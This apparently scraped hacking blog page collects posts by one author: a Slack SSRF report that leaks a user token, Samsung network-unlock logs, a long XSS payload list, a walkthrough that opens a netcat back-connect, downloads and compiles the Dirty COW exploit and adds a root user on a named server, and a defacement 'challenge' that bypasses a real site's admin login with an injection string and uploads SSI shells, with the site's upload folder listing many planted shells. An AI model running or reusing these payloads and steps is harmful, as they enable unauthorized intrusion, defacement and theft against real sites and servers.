This Blog just for Educational Purpose. One of the best ways is not responsible for the authorities. Stay With me to learn about Hacking and also SQLi Basic with Manual.
Don't wanna be here? Send us removal request.
Link
LAVA IRIS 88 FRP BYPASS UNLOCK FILE MT6739 DLL Image Filed Fixed FIRMWARE 100% TESTED - SQLi Basic
0 notes
Link
The Cracking Tutorial Of snd-reversing with lena-tutorial01.tutorial By Black_EyE - SQLi Basic
0 notes
Video
youtube
Hi Slack Security Team, Here is Shaifullah Shaon (Black_EyE), An Ethical Hacker. a white hat cyber security researcher from Bangladesh reporting a serious [3'rd ranking in OWASP] security vulnerability on your system. I faced a technical security bug called "SSRF (Server Site Request Forgery)on slack.com". Now I exploited it. If you verify more, so you can see my video poc that was unlisted my youtube channel. Let's follow me, 1. I already Open my Account. 2. I was create an app which I installed into my cheat box. 3. Now I use /comamnd which I was set a url http://scanme.nmap.org:22 4. Now I put /comma (Slash command) on message box. 聽 SSRF Testing APP 10:39 AM 聽 Only visible to you 聽 SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8 聽 As you see, Here showing The Open SSH Version. 5. Now I am change website url from http://scanme.nmap.org:22 to 31.208.61.136 (This is my Own ssh) and use my 55 Port. 6. Now again put /comma (Slash command) on message box. 7. As you see here, Slack message box showing me 503 (Timeout was reached). But Here see my ssh. I was forwarded my 55 no port using netcat. 聽 聽nc -lnvvp 55 聽 聽listening on [::]:55 ... 聽 here was port listing, Now when see the 503 (Timeout was reached) from message box, Here I get user token from your server. 聽 token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage& 聽 user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=& 聽 response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x POST / HTTP/1.1 User-Agent: Slackbot 1.0 (+https://api.slack.com/robots) Accept-Encoding: gzip,deflate Accept: application/json,*/* Content-Length: 298 Content-Type: application/x-www-form-urlencoded Host: 31.208.61.136:55 Cache-Control: max-age=259200 Connection: keep-alive token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x 聽 聽 ** Note: An attacker can stole user token using this issue. Please See my Video Poc for understand clearly. Hopefully Those are Very critical issue. Resolve those issue as soon as possible. Here is proof as video concept (unlisted): https://youtu.be/REV3IG5qGFc Thank you Shaifullah Shaon (Black_EyE) [email protected] It's an Online It Section Please Subscribe us.
0 notes
Video
youtube
Welcome To Shaifullah Shaon (Black_EyE) From Bangladesh How to Network/Country Unlock SM-J400F/DS with Samkey
Hi, I am Shaifullah Shaon (Black_EyE) From Bangladesh.
Today I wanna show you how to Unlock Network Lock/ Country Lock of Samsung SM-J400F/DS with Samkey.
Connecting to SamKEY SERVER [0], please wait...OK Checking account validation......OK Remaining balance : 6 Greeting message : Welcome to SamKEY !
We need to buy credit and loginto Samkey Software. After login If your Mobile shown ENter Puk code to unlock your network, please Uncheck Autometic Unlock from your samkey software. Otherwise your Credit will be lost.
Remember it again: If your Mobile shown ENter Puk code to unlock your network, please Uncheck Autometic Unlock from your samkey software. Otherwise your Credit will be lost.
Now Open Debugging mode using the code *#0808# Select DM+ACM+ADB
Accept Adb command from Phone. Wait untill finish the Operation. After Operation Successfull its shown you 2 Codes.
1. Network Pin Code. 2. Puk /Freeze Code.
Enter your pin as want your phone. Itd demon Unlock.
Code is:
Date 聽 : 11/22/2018 6:12:46 PM Model 聽: SM-J400F IMEI 聽 : 35841009165xxxx Network: 50829362 U-SIM 聽: 00000000 CPLock : 00000000 SPLock : 00000000 Subset : 00000000 Freeze : 49471860 ------------------------
Searching for SAMSUNG Mobile USB Modem...OK SAMSUNG USB Modem detected on [COM55] Looking for DEVICE...OK Reading USB MODEM information...OK MODEL 聽: SM-J400F VER 聽: J400FXXU2ARJ3/J400FOJM2ARJ3/J400FXXU2ARI2/J400FXXU2ARJ3 IMEI : 35841009165xxxx S/N 聽: RV8K6185EN U/N 聽: CQE009E27D0A535 Loading ADB module...OK Starting ADB module...OK Searching for SAMSUNG ADB device...OK Checking device authorization...OK Reading ADB device information... ADB Serial Number : 42009E27D0A535F3 CP Version : J400FXXU2ARI2 Android Version : 8.0.0 Warranty VOID : 0 Loading RIL applet...OK Starting RIL applet...OK Reading RADIO information... IMEI : 35841009165xxxx MSL address : RV8K6185EN Initializing RIL applet......OK Starting exploit...[SHL:OK]...OK Reading HW signature...OK Reading data...OK Calculating security...[KEY:OK]...OK Sending data to SERVER...OK Waiting for SERVER response (may take few minutes)...OK
Thanks for Watching The Video.
Regards,
Shaifullah Shaon (Black_EyE) SQLi Basic
0 notes
Video
Welcome To Shaifullah Shaon (Black_EyE) From Bangladesh How to Network/Country Unlock SM-J600FN with Samkey
Hi, I am Shaifullah Shaon (Black_EyE) From Bangladesh.
Today I wanna show you how to Unlock Network Lock/ Country Lock of Samsung SM-J600FN with Samkey.
We need to buy credit and loginto Samkey Software. After login If your Mobile shown ENter Puk code to unlock your network, please unblock Autometic Unlock from your samkey software. Otherwise your Credit will be lost.
Remember it again: If your Mobile shown ENter Puk code to unlock your network, please Uncheck Autometic Unlock from your samkey software. Otherwise your Credit will be lost.
Now Open Debugging mode using the code *#0808# Select DM+ACM+ADB
Accept Adb command from Phone. Wait untill finish the Operation. After Operation Successfull its shown you 2 Codes.
1. Network Pin Code. 2. Puk /Freeze Code.
Enter your pin as want your phone. Itd demon Unlock.
Code is:
Date 聽 : 11/22/2018 3:11:02 PM Model 聽: SM-J600FN IMEI 聽 : 3570630938xxxxx Network: 15084047 U-SIM 聽: 00000000 CPLock : 00000000 SPLock : 00000000 Subset : 00000000 Freeze : 93682040 ------------------------
Searching for SAMSUNG Mobile USB Modem...OK SAMSUNG USB Modem detected on [COM50] Looking for DEVICE...OK Reading USB MODEM information...OK MODEL 聽: SM-J600FN VER 聽: J600FNXXU3ARH1/J600FNOXM3ARH1/J600FXXU3ARH1/J600FNXXU3ARH1 IMEI : 3570630938xxxxx S/N 聽: R58K92AT8V U/N 聽: CBJ00204DB85465 Loading ADB module...OK Starting ADB module...OK Searching for SAMSUNG ADB device...OK Checking device authorization...OK Reading ADB device information... ADB Serial Number : 5200204DB8546519 CP Version : J600FXXU3ARH1 Android Version : 8.0.0 Warranty VOID : 0 Loading RIL applet...OK Starting RIL applet...OK Reading RADIO information... IMEI : 3570630938xxxxx MSL address : R58K92AT8V Initializing RIL applet......OK Starting exploit...[SHL:OK]...OK Reading HW signature...OK Reading data...OK Calculating security...[KEY:OK]...OK Sending data to SERVER...OK Waiting for SERVER response (may take few minutes)...OK
Thanks for Watching The Video.
Regards,
Shaifullah Shaon (Black_EyE) SQLi Basic
0 notes
Link
Winmax Dolphin V4 Firmware File Free Download 100% Tested - No Confusion - SQLi Basic
0 notes
Text
</script>"><script>prompt(1)</script></ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>"><img src=x onerror=prompt(1)>"><svg/onload=prompt(document.domain)>"><iframe/src=javascript:prompt(1)>"><h1 onclick=prompt(1)>Clickme</h1>"><a href=javascript:prompt(1)>Clickme</a>"><a href="javascript:confirm%28 1%29">Clickme</a>"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>"><textarea autofocus onfocus=prompt(1)>"><a/href=javascript:co\u006efir\u006d("1")>clickme</a>"><script>co\u006efir\u006d`1`</script>"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>"><img src=x onerror=co\u006efir\u006d`1`>"><svg/onload=co\u006efir\u006d`1`>"><iframe/src=javascript:co\u006efir\u006d%28 1%29>"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>"><a href=javascript:prompt%28 1%29>Clickme</a>"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>"><textarea autofocus onfocus=co\u006efir\u006d(1)>"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme"><img/src=x%0Aonerror=prompt`1`>"><iframe srcdoc="<img src=x:x onerror=alert(1)>">"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1><iframe %00 src="	javascript:prompt(1)	"%00><svg><style>{font-family:'<iframe/onload=confirm(1)>'<input/onmouseover="javaSCRIPT:confirm(1)"<sVg><scRipt %00>alert(1) {Opera}<img/src=`%00` onerror=this.onerror=confirm(1)<form><isindex formaction="javascript:confirm(1)"<img src=`%00`
 onerror=alert(1)
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/"><h1/onmouseover='\u0061lert(1)'>%00<iframe/src="data:text/html,<svg onload=alert(1)>"><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/><svg><script xlink:href=data:,window.open('https://www.google.com/')></script<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"><iframe src=javascript:alert(document.location)><form><a href="javascript:\u0061lert(1)">X</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'><img/  src=`~` onerror=prompt(1)><form><iframe  src="javascript:alert(1)" ;><a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</ahttp://www.google<script .com>alert(document.location)</script<a href=[�]"� onmouseover=prompt(1)//">XYZ</a<img/src=@ onerror = prompt('1')<style/onload=prompt('XSS')<script ^__^>alert(String.fromCharCode(49))</script ^__^</style ><script :-(>/**/alert(document.location)/**/</script :-(�</form><input type="date" onfocus="alert(1)"><form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/<iframe srcdoc='<body onload=prompt(1)>'><a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a><script ~~~>alert(0%0)</script ~~~><style/onload=<!-- >alert(1)><///style///><span %2F onmousemove='alert(1)'>SPAN<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}<marquee onstart='javascript:alert(1)'>^__^<div/style="width:expression(confirm(1))">X</div> {IE7}<iframe/%00/ src=javaSCRIPT:alert(1)//<form/action=javascript:alert(document.cookie)><input/type='submit'>///*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style><a/href="javascript: javascript:prompt(1)"><input type="X"></plaintext\></|\><plaintext/onmouseover=prompt(1)</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}<a href="javascript:\u0061le%72t(1)"><button><div onmouseover='alert(1)'>DIV</div><iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><a href="jAvAsCrIpT:alert(1)">X</a><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><var onmouseover="prompt(1)">On Mouse Over</var><a href=javascript:alert(document.cookie)>Click Here</a><img src="/" =_=" title="onerror='prompt(1)'"><%<!--'%><script>alert(1);</script --><script src="data:text/javascript,alert(1)"></script><iframe/src \/\/onload = prompt(1)<iframe/onreadystatechange=alert(1)<svg/onload=alert(1)<input value=<><iframe/src=javascript:confirm(1)<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>http://www.<script>alert(1)</script .com<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe><svg><script ?>alert(1)<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><img src=`xx:xx`onerror=alert(1)><meta http-equiv="refresh" content="0;javascript:alert(1)"/><math><a xlink:href="//jsfiddle.net/t846h/">click<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always><svg contentScriptType=text/vbs><script>MsgBox+1<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script<object data=javascript:\u0061le%72t(1)><script>+-+-1-+-+alert(1)</script><body/onload=<!-->
alert(1)><script itworksinallbrowsers>/*<script* */alert(1)</script<img src ?itworksonchrome?\/onerror = alert(1)<svg><script>//
confirm(1);</script </svg><svg><script onlypossibleinopera:-)> alert(1)<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe<script x> alert(1) </script 1=2<div/onmouseover='alert(1)'> style="x:"><--`<img/src=` onerror=alert(1)> --!><script/src=data:text/javascript,alert(1)></script><div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>"><img src=x onerror=window.open('https://www.google.com/');><form><button formaction=javascript:alert(1)>CLICKME<math><a xlink:href="//jsfiddle.net/t846h/">click<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
0 notes
Link
HiAssalamu Alaikum Oa RahmatullahI am B14Ck_EyEToday I wanna show you how to root karnel 3.10.0 Aug 2016 using local root exploitToday I use Dirtycow exploitwee needed to shell login 1stNow we needed to check which command here supportedgcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, ncall are supported hereAll function enable hereNow needed to find local root exploit from googleHere We find vuln exploit for local rootNow needed to back connect using netcathere already had netcatNow I forword my 443 port for backconnect with serverHere my ip is 113.11.44.157and now try to back connectNow i Success to backconnectNow remove some .bak file. cz, I already try heresuccessnow get exploitusing wget commandcommand : 1st: wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c2nd: gcc dirty.c -o dirty -pthread -lcryptI am change user in manual edit dirty.cnow try to gcc encrypt using 2nd command.successfind ls dirtyoh ! Here :DNow try to next command3rd: chmod x dirty4th: ./dirty5th: pass= 123123Now here take some timesNow we needed to access root using puttyI had already putty software User : 1004 ( brandperceptions ) Group: 1004 ( brandperceptions )Server : ApacheUseful : gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, ncDownloaders : wget, lynx, curl, lwp-mirrorD/functions : All Function EnableCwd : /home/brandperceptions/public_html/dev/wp-content/themes/twentythirteen/ drwxrwxr-x [ home ] Sv IPYour IPHDDFreePHPSafe ModeDomains : 104.31.75.7Here server ip is under cloudfirewalso we needed to find real ip in website using ifconfig execuit commandcloudy_root:clBcqeMPHpYtA:0:0:pwned:/root:/bin/bashuser created successfully :D37.187.157.212it's server ipnow try to ssh loginand get root accessThanks for watching and subscribe my videos and channelStay with medon't harm any site please. Specially Thanks to Ahmed Raza Bro. Take care all brothersAllah hafezWe are the Cyber TeamRoXsorry for my bad connection and also bad English :This Channel Just for Educational Purpose. One of the best ways is not responsible for the authorities. Stay With us to Learn Basic SQLi with Manual. Thanks All:** My Channel : https://www.youtube.com/c/sqlibasic** Another Channel: https://www.youtube.com/channel/UCJ0ZErE0Xq8TZP0_3bVxrlA** My Facebook: https://www.facebook.com/shaifullah01** My Page: https://www.facebook.com/sqlibasic** My Blog: http://sqli-basic.blogspot.com//**x**/ Please like my videos. /**x**/ Please subscribe my channel/**x**/ Please click on my add if u want.It's an Online It SectionPlease Subscribe us.
0 notes
Link
500 Internal Server Error Bypass | ssi/shtml shell upload by B14ck_EyE - SQLi Basic
ssi/shtml shell upload | 500 Internal Server Error Bypass
Assalamu Walaikum I am B14ck_EyE as u know Today I wanna show u how to upload shell in a website where having problem execute php as 500 internal server error
Defacing Challenge (Easy) site:aHR0cDovL3d3dy5tc2hvc3BpdGFsaXR5Lmlu Task:Upload Your Deface Page in public_html(see my POC) Rules:Dont use reverse ip :p My POC: http://www.mshospitality.in/index.html Solvers: 1.Faisal Afzal 2.Anthony Edward Stark 3.Shaifullah Shaon 4. 5. comment your POC to get in solvers list & please harm the website =D :v
We needed to bypass admin panel using xpath sql injection
here I used email: [email protected] pass: 'or'1'='1
its my uploader just follow me
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Server at www.mshospitality.in Port 80
500 Internal Server error Try to upload html follow me :D
Hacked Test By B14Ck_EyE Challenged Completed by B14Ck_EyE
Here html successfully worked
Now I tried to use null byte shell as image :D
Same error that means here php not be executable
Now try to upload shtml file :D
http://www.mshospitality.in/upload/1480755910project_test.shtml
Here successfully working shtml file
so we needed to upload shtml shell
http://www.mshospitality.in/upload/1480756058project_ssi.shtml
shtml working :D
now We try to upload our shell :D
0331c160795dadadf957d87bb13daa84.jpg 0b5a5b6c7a66a7d12ac6ebb7065845e2.jpg 1.txt 11.txt 1389189245project_dummy1.jpg 1394435404project_1.jpg 1394435414project_2.jpg 1394435424project_3.jpg 1394435434project_4.jpg 1394435446project_5.jpg 1394435454project_6.jpg 1394435462project_7.jpg 1394445613project_hanwantmahaltoppic.jpg 1394445690project_1135headerpic.jpg 1394445713project_hanwantmahaltoppic.jpg 1394445725project_hanwantmahaltoppic.jpg 1394445753project_hanwantmahaltoppic.jpg 1394445920project_1135headerpic.jpg 1394445956project_hanwantmahaltoppic.jpg 1394445984project_royalcelebrationheaderpic.jpg 1394449387project_royallogo.png 1394449394project_royallogo.png 1394450491project_enquiryicon.png 1394450910project_shadow.png 1394456557project_exploreicon.png 1394456572project_shadow.png 1394456579project_exploreicon.png 1394633070project_hanwantlogo.png 1394633084project_1135logo.png 1394633103project_royallogo.png 1394707997project_hanwantlogo.png 1394708013project_1135logo.png 1394708075project_royallogo.png 1394720197project_1.jpg 1394720210project_2.jpg 1394783387project_3.jpg 1394783427project_4.jpg 1394783451project_5.jpg 1394783474project_6.jpg 1394783494project_7.jpg 1394783774project_1135headerpic.jpg 1394803578project_slide-img-4.jpg 1395216033project_1135headerpic.jpg 1395216074project_hanwantmahaltoppic.jpg 1395216099project_royalcelebrationheaderpic.jpg 1395216473project_1135headerpic.jpg 1395216483project_1135headerpic.jpg 1395216511project_1135headerpic.jpg 1395216549project_1135headerpic.jpg 1395216569project_1135headerpic.jpg 1395216773project_hanwantmahaltoppic.jpg 1395216784project_hanwantmahaltoppic.jpg 1395216799project_hanwantmahaltoppic.jpg 1395216820project_hanwantmahaltoppic.jpg 1395216878project_hanwantmahaltoppic.jpg 1395216925project_hanwantmahaltoppic.jpg 1395217292project_royalcelebrationheaderpic.jpg 1395217311project_royalcelebrationheaderpic.jpg 1395217339project_royalcelebrationheaderpic.jpg 1395217369project_royalcelebrationheaderpic.jpg 1395217401project_royalcelebrationheaderpic.jpg 1395223218project_1135headerpic.jpg 1395223257project_1135headerpic.jpg 1395223269project_1135headerpic.jpg 1395223285project_royalcelebrationheaderpic.jpg 1395223304project_hanwantmahaltoppic.jpg 1395223319project_hanwantmahaltoppic.jpg 1395223882project_1135headerpic.jpg 1395230450project_1135headerpic.jpg 1395400260project_royalcelebrationheaderpic.jpg 1395402900project_Sheesh_Mahal_2_copy.jpg 1395403031project_Sheesh_Mahal_2_copy.jpg 1395403145project_04_Swarna_Mahal.JPG 1395403192project_377720_415411085188039_1217465187_n.jpg 1395403296project_table.jpg 1395404101project_1.jpg 1395404282project_2.jpg 1395404361project_4.jpg 1395407612project_1135headerpic.jpg 1395409333project_royalcelebrationheaderpic.jpg 1406825455project_Desert.jpg 1406875590project_Chrysanthemum.jpg 1406875694project_Chrysanthemum.jpg 1406876741project_1395409333project_royalcelebrationheaderpic.jpg 1406884235project_Desert.jpg 1406885562project_1395409333project_royalcelebrationheaderpic.jpg 1406890034project_1395409333project_royalcelebrationheaderpic.jpg 1406894327project_1395409333project_royalcelebrationheaderpic.jpg 1407157261project_her.jpg 1407743945project_ext5.jpg 1407744045project_ext1.jpg 1407744084project_ext2.jpg 1407744097project_ext3.jpg 1407744109project_ext4.jpg 1407744136project_ext5.jpg 1407744261project_sheeshmain.jpg 1407744352project_sheeshmain.jpg 1407744445project_sheesh_table.jpg 1407744460project_sheeshmahal1.jpg 1407744482project_sheeshmahal2.jpg 1407744499project_sheeshmahal3.jpg 1407744520project_sheeshmahal4.jpg 1407744531project_sheeshmahal5.jpg 1407744755project_shahiaangan1.jpg 1407744821project_shahiaangan1.jpg 1407744839project_shahiaangan2.jpg 1407744853project_shahiaangan3.jpg 1407744871project_shahiaangan4.jpg 1407744890project_shahiaangan5.jpg 1407745020project_suryamahal1.jpg 1407745070project_suryamahal1.jpg 1407745101project_suryamahal2.jpg 1407745109project_suvarnamahal0.jpg 1407745122project_suvarnamahal1.jpg 1407745149project_suvarnamahal2.jpg 1407745174project_suvarnamahal3.jpg 1407745180project_suvarnamahal4.jpg 1407745209project_suvarnamahal5.jpg 1407745293project_pvtterrace1.jpg 1407745319project_pvtterrace1.jpg 1407745359project_pvtterrace2.jpg 1407745381project_pvtterrace3.jpg 1407745388project_pvtterrace4.jpg 1407745547project_hanwantmahal.jpg 1407745573project_hanwantmahal.jpg 1407745583project_hanwantmahal2.jpg 1407745600project_hanwantmahal3.jpg 1407745862project_hw_amrindersingh.jpg 1407745934project_hw_amrindersingh.jpg 1407745996project_rahuldravid_hw.jpg 1407746010project_ashishnehara_h.jpg 1407746040project_karan_billmoria.jpg 1407746055project_sonamkapoorhw.jpg 1407746076project_shanewatson.jpg 1407746115project_cickter.jpg 1407746144project_hellomag_1.jpg 1407746158project_hellomag_2.jpg 1407746179project_hellomag_3.jpg 1407746227project_hellomag_4.jpg 1407746284project_raghu_rathore_1.jpg 1407746337project_raghu_rathore_1.jpg 1407746352project_angadkhan.jpg 1407746379project_gajsingh.jpg 1407746401project_gajsingh2.jpg 1407746441project_preeti_sameer_shuhag.jpg 1407746529project_rickstein_hw.jpg 1407746673project_hellomag5.jpg 1407747532project_majlis1.jpg 1407747569project_majlis1.jpg 1407747588project_majlis2.jpg 1407747603project_majlis3.jpg 1407747610project_majlis4.jpg 1407747629project_majlis5.jpg 1413360782project_1395407612project_1135headerpic.jpg 1413360918project_1395216773project_hanwantmahaltoppic.jpg 1413465190project_hanwantmahaltoppic.jpg 1413467002project_1135headerpic.jpg 1414411357project_1395223269project_1135headerpic.jpg 1414412450project_hanwantlogo.png 1421755896project_Madspot.php 1421755977project_Madspot.php 1427291711project_1407745573project_hanwantmahal.jpg 1427311224project__50_.jpg 1427311357project__135__copy.jpg 1427311379project__143_.jpg 1427311425project_02-8x10-_2_Print.jpg 1427311438project_03-8x12-_2_Print.jpg 1427311462project_09.-_8x12_-_2_-_Print.jpg 1427356694project__278_.jpg 1427619356project_clinton.jpg 1427619435project_soni1.jpg 1427619460project_soni2.jpg 1427619748project_rathore.jpg 1427619785project_rathore.jpg 1434048506project_1407745020project_suryamahal1.jpg 1434048712project_1407745109project_suvarnamahal0.jpg 1434048766project_1407745020project_suryamahal1.jpg 1448210910project_u.php 1448210950project_Pakistan.html 1453107995project_soft.php 1457611692project_priv.jpg.php 1457611781project_priv.php 1457611812project_stup.php 1457611863project_cage.php 1460998652project_upp.php 1460999343project_FB_IMG_14566875174830113.jpg 1461011790project_mini.php 1461012024project_mini.php 1461012142project_minii.PhP 1461012663project_hshel.php..jpg 1461012790project_newshell.php3 1461012823project_zeee.pHP3 1461012940project_newshell.php3 1465444392project_shell.Phtml 1465444473project_00000000000000000000.Phtml 1465444512project_index.html 1465444558project_index.html 1465444606project_index.html 1466701054project_pca.php 1469297638project_king.html 1469297863project_ctr.html 1469298566project_kkkk.html 1469298865project_PageDeface.HTML 1469298969project_PageDeface.HTML 1469299038project_kkkk.html 1471117531project_Index.php 1474684866project_book.php 1476024522project_dh.php 1476025270project_dh.php 1476026147project_blksql.html 1476064473project_12.php 1476298615project_popanda.php 1476298785project_index3.html 1476299834project_index2.html 1476304983project_popanda.html 1476305332project_popanda.html 1476322494project_new_deface.html 1476412919project_TT-Shell.php 1476414317project_TT-Shell.php 1476415868project_b374k.php5.jpg 1476415967project_b374k.php5 1476425968project_index.html 1476426168project_index.html 1476426258project_index.html 1476426731project_index.html 1476427231project_Cute_Anna_with_shave_clean_sexy_Pussy_sucking_fucking_hard.jpg 1476795592project_wcg.php 1476795657project_received_161971367594238.jpeg 1476795727project_r.html 1476795801project_r.html 1476796268project_r.html 1476796432project_r.html 1476796571project_r.html 1478350283project_indexFor-Ind.html 1478356541project_za.php 1478356569project_mini.php 1478356682project_fud.php 1478356774project_up.php 1478356825project_za.php 1478356834project_up.PhP2 1478356940project_up.php 1478404047project_500.php 1478404083project_clean.php 1478404681project_Minion.jpg 1478404755project_61deUH0YT9L._SX522_.jpg 1478405479project_fud.PhP 1478419364project_up.php 1478419388project_up.PhP2 1478419408project_up.PHP 1478419422project_up.pHp 1478419443project_mini.phtml 1478419471project_up.phP4 1478627924project_14947791_1829267847286398_7298840031724537540_n.jpg 1478844264project_up.php 1480047785project_upppy.php 1480048285project_upppy.php 1480048325project_Ghost.php 1480067831project_NEW.HTML 1480075333project_PicsArt_10-11-12.19.56.jpg 1480075687project_PicsArt_10-11-12.19.56.jpg 1480151423project_received_1806504962950112.jpeg 1480153346project_3ca_shell-3CArmy.php 1480153398project_ERROR_SQUAD-1.php 1480153449project_wso-2.8.php.jpg 1480181866project_15107385_251744818576478_6410785766490643113_n.jpg 1480693225project_works.php 1480693305project_Pakistan_Zindabad.html 1480693628project_works.php 1480694286project_works.php 1480696532project_trh.pjpeg 1480696550project_trh.phtml 1480696781project_1.jpg.pjpg.jpg.php 1480696797project_1.jpg.pjpg.pHp1 1480696827project_1.pjpg.phP3.png.php 1480696905project_1.jpg.pjpg.pHp1.jpg.pjpeg 1480696957project_1.jpg.pjpg.pHp1.jpg....php.phtml 1480698967project_trh.php 1480702195project_Uploader.phtml 1480702245project_Alone_programmer@420@[email protected] 1480702318project_Uploader.phtml 1480702687project_uploader.php 1480703685project_uploader.php 1480703909project_ssi.shtml 1480704076project_uploader.pHp2 1480720312project_sec.out 1480729112project_upk.php 1480729235project_upk.php 1480732898project_gamer.php 1480746684project_Wso1.php.pjpg 1480749930project_up.phP 1480750033project_up.php.;jpg 1480752181project_me.html 1480752917project_a.txt 1480753001project_a.php 1480753068project_sly.php 1480753348project_sly.jpg 1480753505project_slayer.php%00.jpg 1480753636project_slayer.php%00.jpg 1480753669project_Birthday-Wish-Display-Picture.png 1480753825project_up.php 1480753992project_ctr.shtml 1480754014project_1.PhP 1480754063project_ctr.shtml 1480754354project_ss.shtml 1480755542project_up.php 1480755693project_test.html 1480755852project_jpeg.php 1480755910project_test.shtml 1480756058project_ssi.shtml 1c3038735d244a87244367d7c3a76024.pdf 1dd2e3dea4d45b4f3438969bd6f3c864.php 324c93ef963395fff556f01b98b821f7.jpg 32ebe0eeca79f638401aef1871d2f7d0.jpg 3595abafc653b2b2efd383bf6e4ebbc0.jpg 3ffa7bff440e359b0192f4cd16dec413.php 40675a0888ced0a97b83d39038d01cf6.jpg 4435272737dedb39eda01ab705b94ed3.php 491e94773b33a3d73c35da90f15c3f18.jpg 4a57fb96022f0c8207fff95201352314.shtml 4da7e9e044fa0e7dfb07158fe19b3886.jpg 5360c4648d363e2d6754d484979f17bf.php335 5b74930b63b1ea7ca5a43df7e02040f7.jpg 5fdb05133ed864fa32101fe6831ccce4.php 6010af591c1d78604e2e80e981cef655.php 6066eb0bf24e34159c4abbc6d19beb55.jpg 6207f93bb9e1d783551e41136bafc89e.asp 62e1f6fc2436603d37062562e3d9e206.jpg 663aced9b643a4c539afd388a836ba24.php 67197cf54809f59769d7b369b69e1cc2.php 6fe653c585c9c057727b6b45ee9ede7c.php 7256c1a36ee9ce3be29f27803506bcd2.php 7936d05ef65adc2f91f0b24598bd66de.shtml 803ed757acdf4e09875ae56da54e1115.jpg 8340c88155f4ac6a98228e2677a223c2.jpg 8e27ea2db7346953cd8d04ac03a12ea7.php 90626a2066900bb041a7604725579938.jpg 91651889ce04d422086304361a25a710.jpg 9430b1593b1a84ebb5ca7069d6d9390d.jpg 97e09e6f7771466732855d807fbe3802.php 